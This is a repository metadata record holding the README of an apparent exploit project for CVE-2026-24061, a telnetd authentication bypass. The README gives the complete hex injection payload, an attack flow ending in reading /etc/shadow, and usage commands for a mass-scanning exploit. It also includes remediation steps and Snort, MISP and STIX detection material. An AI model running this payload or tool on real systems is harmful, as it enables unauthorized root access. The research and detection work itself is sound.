{"id":49182271,"url":"https://github.com/franckferman/cve_2026_24061","last_synced_at":"2026-04-23T02:01:13.617Z","repository":{"id":336020400,"uuid":"1147892492","full_name":"franckferman/CVE_2026_24061","owner":"franckferman","description":" GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection.","archived":false,"fork":false,"pushed_at":"2026-03-27T13:51:19.000Z","size":35,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-03-27T22:55:31.326Z","etag":null,"topics":["authentication-bypass","cve","cve-2026-24061","cves","exploit","exploitation","exploiting","inetutils","redteam","root-exploit","telnet","telnet-exploit","telnet-hacking","telnetd","telnetd-rce","vulnerability","vulnerability-detection","vulnerability-research","vulnerability-scanner","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"https://github.com/franckferman/CVE_2026_24061/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/franckferman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-02-02T10:30:25.000Z","updated_at":"2026-03-27T13:51:23.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/franckferman/CVE_2026_24061","commit_stats":null,"previous_names":["franckferman/cve_2026_24061_poc","franckferman/cve_2026_24061"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/franckferman/CVE_2026_24061","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/franckferman%2FCVE_2026_24061","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/franckferman%2FCVE_2026_24061/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/franckferman%2FCVE_2026_24061/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/franckferman%2FCVE_2026_24061/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/franckferman","download_url":"https://codeload.github.com/franckferman/CVE_2026_24061/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/franckferman%2FCVE_2026_24061/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32162611,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-22T17:06:48.269Z","status":"online","status_checked_at":"2026-04-23T02:00:06.710Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["authentication-bypass","cve","cve-2026-24061","cves","exploit","exploitation","exploiting","inetutils","redteam","root-exploit","telnet","telnet-exploit","telnet-hacking","telnetd","telnetd-rce","vulnerability","vulnerability-detection","vulnerability-research","vulnerability-scanner","vulnerability-scanners"],"created_at":"2026-04-23T02:01:12.325Z","updated_at":"2026-04-23T02:01:13.603Z","avatar_url":"https://github.com/franckferman.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/CVE--2026--24061-Critical%20(9.8)-c0392b?style=flat\" alt=\"CVE Score\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/License-AGPL--3.0-blue.svg\" alt=\"License\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/Python-3-blue.svg\" alt=\"Python\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/Dependencies-None-green.svg\" alt=\"No deps\"\u003e\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n \u003cp\u003e\n \u003cstrong\u003eGNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection\u003c/strong\u003e\n \u003c/p\u003e\n \u003cp\u003e\n \u003ca href=\"#vulnerability-overview\"\u003eOverview\u003c/a\u003e -\n \u003ca href=\"#technical-analysis\"\u003eTechnical Analysis\u003c/a\u003e -\n \u003ca href=\"#affected-versions\"\u003eAffected Versions\u003c/a\u003e -\n \u003ca href=\"#usage\"\u003eUsage\u003c/a\u003e -\n \u003ca href=\"#remediation-and-mitigation\"\u003eRemediation\u003c/a\u003e -\n \u003ca href=\"#references\"\u003eReferences\u003c/a\u003e\n \u003c/p\u003e\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n## Vulnerability Overview\n\n**CVE-2026-24061** is a critical authentication bypass vulnerability in the `telnetd` daemon distributed as part of **GNU InetUtils**. The flaw resides in the handling of the Telnet `NEW-ENVIRON` option ([RFC 1572](https://datatracker.ietf.org/doc/html/rfc1572)) during the initial protocol handshake.\n\nThe root cause is a failure to sanitize client-supplied environment variables before passing them to the `login(1)` program. When the Telnet daemon receives a `NEW-ENVIRON IS` sub-negotiation packet containing the variable `USER` with the value `-f root`, it passes this unsanitized value directly to the system `login` binary.\n\nOn systems where `login` accepts the `-f` flag (force login without password verification), this results in an unauthenticated root session being granted to the remote attacker.\n\nThis vulnerability class has historical precedent: CVE-2001-0797 in SysV telnetd and the well-known Linux telnetd `-f` bypass from 1994 exploited the same fundamental failure to sanitize environment-sourced arguments passed to privileged binaries.\n\n**No credentials required. No prior access needed. A single network packet sequence achieves root.**\n\n## Technical Analysis\n\n### Root Cause\n\nGNU InetUtils `telnetd` processes `NEW-ENVIRON` (option code `0x27`, per RFC 1572) sub-negotiation to collect client-supplied environment variables. These variables are assembled into an argument vector and passed to `execve(2)` when spawning `login(1)`.\n\nThe vulnerability is triggered as follows:\n\n1. The server sends `IAC DO NEW-ENVIRON`, soliciting environment variables from the client.\n2. The malicious client replies with `IAC WILL NEW-ENVIRON`.\n3. The server follows with `IAC SB NEW-ENVIRON SEND IAC SE`.\n4. The client sends the injected payload:\n\n```\nIAC SB NEW-ENVIRON IS\n VAR \"USER\" VALUE \"-f root\"\nIAC SE\n```\n\n5. `telnetd` constructs the `login` invocation as `login -f root`.\n6. `login(1)` interprets `-f` as \"force login, skip authentication\" and logs in the specified user (`root`) without requiring a password.\n\n### Protocol-Level Breakdown\n\n| Step | Direction | Telnet Bytes (hex) | Meaning |\n|------|-----------|--------------------|---------|\n| 1 | S -\u003e C | `FF FD 27` | IAC DO NEW-ENVIRON |\n| 2 | C -\u003e S | `FF FB 27` | IAC WILL NEW-ENVIRON |\n| 3 | S -\u003e C | `FF FA 27 01 FF F0` | IAC SB NEW-ENVIRON SEND IAC SE |\n| 4 | C -\u003e S | `FF FA 27 00 00 55 53 45 52 01 2D 66 20 72 6F 6F 74 FF F0` | IAC SB NEW-ENVIRON IS VAR \"USER\" VALUE \"-f root\" IAC SE |\n\n### Why `-f root` Works\n\nThe `login(1)` binary on many Linux systems accepts the `-f \u003cuser\u003e` flag for \"pre-authenticated\" logins, historically used by terminal multiplexers and `rlogin`. When `telnetd` builds its `exec` call and fails to strip leading hyphens or validate option-like strings in environment variable values, it inadvertently passes attacker-controlled flags directly to `login`.\n\nThe effective call becomes:\n\n```c\nexecve(\"/bin/login\", [\"login\", \"-f\", \"root\"], envp);\n```\n\n### Attack Scenario\n\n```\nAttacker Vulnerable telnetd (port 23)\n | |\n |------- TCP SYN (port 23) -----------------------\u003e|\n |\u003c------ TCP SYN-ACK -------------------------------|\n |------- TCP ACK ----------------------------------\u003e|\n | |\n |\u003c------ Telnet banner + IAC DO NEW-ENVIRON --------|\n |------- IAC WILL NEW-ENVIRON ---------------------\u003e|\n |\u003c------ IAC SB NEW-ENVIRON SEND IAC SE ------------|\n | |\n |------- IAC SB NEW-ENVIRON IS |\n | VAR \"USER\" VALUE \"-f root\" IAC SE --------\u003e|\n | |\n | [telnetd calls: login -f root] |\n | |\n |\u003c------ Root shell prompt (#) ---------------------|\n | |\n |------- id; whoami; cat /etc/shadow --------------\u003e|\n |\u003c------ uid=0(root) root /etc/shadow contents -----|\n```\n\n**Prerequisites:**\n- Target system running GNU InetUtils `telnetd` (TCP/23 open)\n- Unpatched version of `inetutils`\n- `login(1)` binary supports the `-f` flag (standard on most Linux distributions)\n- No firewall blocking TCP/23\n\n## Affected Versions\n\n| Software | Affected Versions | Status |\n|----------|-------------------|--------|\n| GNU InetUtils telnetd | \u003c= 2.x (specific patched version TBD) | Vulnerable |\n| Distributions shipping unpatched GNU inetutils | Various | Check vendor advisory |\n\n\u003e Verify whether your distribution ships a patched version. Many modern systems have Telnet disabled by default; exposure requires an explicitly running `telnetd`.\n\n## CVSS Score\n\n| Metric | Value |\n|--------|-------|\n| **CVSS v3.1 Base Score** | **9.8 (Critical)** |\n| Attack Vector | Network |\n| Attack Complexity | Low |\n| Privileges Required | None |\n| User Interaction | None |\n| Scope | Unchanged |\n| Confidentiality Impact | High |\n| Integrity Impact | High |\n| Availability Impact | High |\n| **Vector String** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |\n\n## MITRE ATT\u0026CK Mapping\n\n| ATT\u0026CK ID | Tactic | Technique | Relevance |\n|-----------|--------|-----------|-----------|\n| [T1190](https://attack.mitre.org/techniques/T1190/) | Initial Access | Exploit Public-Facing Application | Direct exploitation of telnetd over the network |\n| [T1059](https://attack.mitre.org/techniques/T1059/) | Execution | Command and Scripting Interpreter | Shell execution post-exploitation |\n| [T1078.004](https://attack.mitre.org/techniques/T1078/004/) | Privilege Escalation / Defense Evasion | Valid Accounts: Local Accounts | Authentication bypass yields a valid root session |\n| [T1548](https://attack.mitre.org/techniques/T1548/) | Privilege Escalation | Abuse Elevation Control Mechanism | `login -f` flag abused to bypass PAM/authentication |\n| [T1046](https://attack.mitre.org/techniques/T1046/) | Discovery | Network Service Discovery | Mass scanning component of the PoC |\n\n## Installation\n\n**Requirements:** Python 3 (standard library only, zero external dependencies).\n\n```bash\ngit clone https://github.com/franckferman/CVE_2026_24061.git\ncd CVE_2026_24061\n```\n\nNo `pip install` needed. Both scripts use only the Python standard library.\n\n## Project Structure\n\n```\npoc_cve_2026_24061.py # Simple PoC (~100 lines) - understand the vulnerability\ncve_2026_24061.py # Industrialized exploit - multithreaded, CIDR, CSV/JSON export\nscripts/\n generate_signatures.py # Auto-generate Snort/Suricata + Sigma rules from payload\n generate_misp_event.py # Generate MISP-importable event JSON\n generate_stix_bundle.py # Generate STIX 2.1 bundle (MISP, OpenCTI, TAXII)\nsignatures/\n snort.rules # Snort/Suricata detection rules (auto-generated)\n sigma.yml # Sigma rule for SIEM (auto-generated)\nindicators/\n misp_event.json # MISP event - import via Events \u003e Add Event \u003e Import\n stix_bundle.json # STIX 2.1 bundle - 11 objects (vuln, indicator, ATT\u0026CK, CoA)\n```\n\n- **`poc_cve_2026_24061.py`**: Minimal, readable, educational. One target, one function, zero abstraction. Read this to understand exactly how the vulnerability works at the protocol level.\n- **`cve_2026_24061.py`**: Industrialized exploit for pentesting engagements. Multithreaded, supports CIDR ranges, file input, CSV/JSON export, quiet mode, custom users.\n\n## Usage\n\n### Simple PoC (poc_cve_2026_24061.py)\n\nExploit a single host. The code is deliberately minimal so you can read it top to bottom and understand the full attack chain.\n\n```bash\n# Basic usage\npython3 poc_cve_2026_24061.py 192.168.1.100\n\n# Custom port\npython3 poc_cve_2026_24061.py 10.0.0.5 2323\n```\n\n### Industrialized Exploit (cve_2026_24061.py)\n\n#### Single Host\n\n```bash\npython3 cve_2026_24061.py -t 192.168.1.100\n```\n\n#### CIDR Range (Mass Scan)\n\n```bash\npython3 cve_2026_24061.py -t 10.0.0.0/24 -T 50\n```\n\n#### File Input\n\n```bash\npython3 cve_2026_24061.py -f targets.txt -o results.csv\n```\n\n### JSON Export\n\n```bash\npython3 cve_2026_24061.py -t 10.0.0.0/24 --json results.json\n```\n\n### Custom Target User\n\n```bash\npython3 cve_2026_24061.py -t 192.168.1.1 --user admin\n```\n\n### Quiet Mode (pipe-friendly)\n\n```bash\npython3 cve_2026_24061.py -t 10.0.0.0/24 -q | tee vulnerable.txt\n```\n\n### Full Options\n\n| Parameter | Default | Description |\n|---|---|---|\n| `-t / --target` | - | Single IP, hostname, or CIDR range |\n| `-f / --file` | - | File containing IPs/CIDRs (one per line, `#` comments) |\n| `-T / --threads` | `10` | Number of concurrent threads |\n| `-p / --port` | `23` | Target Telnet port |\n| `--timeout` | `5` | Socket timeout in seconds |\n| `--user` | `root` | Username for the `-f` payload |\n| `-o / --output` | - | Export results to CSV file |\n| `--json` | - | Export results to JSON file |\n| `-q / --quiet` | off | Quiet mode: only print vulnerable targets (one per line) |\n| `--no-color` | off | Disable ANSI color output |\n\n### Output Statuses\n\n| Status | Meaning |\n|--------|---------|\n| `[VULN]` | Host confirmed vulnerable - root shell obtained |\n| `[SAFE]` | Host responded but authentication was not bypassed |\n| `[CLOS]` | Port closed or connection refused |\n| `[ERR ]` | Socket or protocol error during scan |\n\nCSV output columns: `ip:port, status, message`\n\n## PoC Behavior\n\nThe script implements the full Telnet `NEW-ENVIRON` negotiation state machine natively in Python without relying on external Telnet libraries:\n\n1. Opens a raw TCP socket to the target on port 23 (configurable).\n2. Reads incoming `IAC` command sequences and responds to `DO NEW-ENVIRON` with `WILL NEW-ENVIRON`.\n3. Upon receiving the server `SB NEW-ENVIRON SEND` sub-negotiation, transmits the injected payload (`USER = \"-f root\"`).\n4. Monitors the response buffer for indicators of successful root login: presence of `uid=0(root)` or a shell prompt (`#`), in the absence of `Login incorrect` or `Password:`.\n5. If the payload was injected, sends `id\\n` and checks for `uid=0(root)` in the response as secondary confirmation.\n\nResults are logged to stdout with color-coded status labels. Optional CSV export records all findings for post-processing.\n\n## Remediation and Mitigation\n\n### Immediate Actions\n\n1. **Disable Telnet entirely.** Telnet transmits all data in cleartext. Replace with SSH.\n\n ```bash\n sudo systemctl disable telnet.socket --now\n sudo systemctl disable inetd --now\n ```\n\n2. **Apply vendor patch.** Install the patched version of `inetutils` from your distribution once available.\n\n3. **Block TCP/23 at perimeter.** Apply firewall rules to deny inbound Telnet connections.\n\n ```bash\n # iptables\n sudo iptables -A INPUT -p tcp --dport 23 -j DROP\n # nftables\n sudo nft add rule inet filter input tcp dport 23 drop\n ```\n\n### Defense in Depth\n\n| Control | Description |\n|---------|-------------|\n| Network segmentation | Restrict Telnet to isolated management networks if it cannot be disabled |\n| PAM hardening | Review PAM configuration; disable `-f` pre-authentication where not required by `login.defs` |\n| IDS/IPS signatures | Detect `NEW-ENVIRON IS VAR USER VALUE -f` patterns in Telnet traffic |\n| Audit logging | Monitor `auth.log` / `secure` for unexpected root logins via `login` |\n| Vulnerability scanning | Run authenticated scans (OpenVAS, Nessus) to identify unpatched `inetutils` |\n\n### Detection (SIEM/IDS)\n\nSnort/Suricata rule skeleton for detecting the exploit in transit:\n\n```\nalert tcp any any -\u003e any 23 (\n msg:\"CVE-2026-24061 telnetd USER=-f root exploit attempt\";\n content:\"|FF FA 27 00 00|USER|01|-f root|FF F0|\";\n sid:2026240610; rev:1;\n)\n```\n\n## Threat Intelligence\n\nThis repository ships pre-generated threat intel artifacts, ready to import into your SOC/CTI stack. They are auto-generated by CI from the actual exploit payload - if the payload changes, the artifacts update.\n\n### MISP\n\nImport `indicators/misp_event.json` directly into any MISP instance:\n\n```\nEvents \u003e Add Event \u003e Import from... \u003e JSON\n```\n\nThe event contains: CVE ID, CVSS vector, Snort signature, payload hex, MITRE ATT\u0026CK tags (T1190, T1548, T1059), CPE, and external references.\n\n### STIX 2.1\n\nImport `indicators/stix_bundle.json` into OpenCTI, TAXII servers, or any STIX 2.1 consumer.\n\nThe bundle contains 11 objects: Vulnerability, Indicator (network pattern), 3 Attack Patterns (MITRE), Course of Action (remediation), Identity, and Relationships linking them.\n\n### IDS Signatures\n\nPre-built rules in `signatures/`:\n\n- `snort.rules` - 3 Snort/Suricata rules (exploit attempt, generic -f injection, post-exploitation root shell)\n- `sigma.yml` - Sigma rule for SIEM correlation\n\n### Regenerate\n\nIf you modify the exploit payload, regenerate all artifacts:\n\n```bash\npython3 scripts/generate_signatures.py\npython3 scripts/generate_misp_event.py\npython3 scripts/generate_stix_bundle.py\n```\n\nReferences: [MISP](https://www.misp-project.org/) - [OpenCTI](https://www.opencti.io/) - [STIX 2.1](https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html) - [Sigma](https://sigmahq.io/)\n\n## References\n\n- [GNU InetUtils Official Repository](https://git.savannah.gnu.org/cgit/inetutils.git)\n- [RFC 1572 - Telnet Environment Option (NEW-ENVIRON)](https://datatracker.ietf.org/doc/html/rfc1572)\n- [RFC 854 - Telnet Protocol Specification](https://datatracker.ietf.org/doc/html/rfc854)\n- [CVE-2001-0797 - Historical SysV telnetd -f bypass (precedent)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797)\n- [MITRE ATT\u0026CK - T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190/)\n- [MITRE ATT\u0026CK - T1548: Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548/)\n- [MISP Project](https://www.misp-project.org/)\n- [Linux login(1) man page](https://man7.org/linux/man-pages/man1/login.1.html)\n\n## Legal Disclaimer\n\nThis tool is provided for **authorized security auditing, academic research, and educational purposes only**. Usage against systems without explicit written permission from the system owner is illegal under applicable computer fraud and abuse laws (including but not limited to the CFAA, Computer Misuse Act, and equivalent legislation). The author accepts no liability for unauthorized or malicious use.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffranckferman%2Fcve_2026_24061","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffranckferman%2Fcve_2026_24061","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffranckferman%2Fcve_2026_24061/lists"}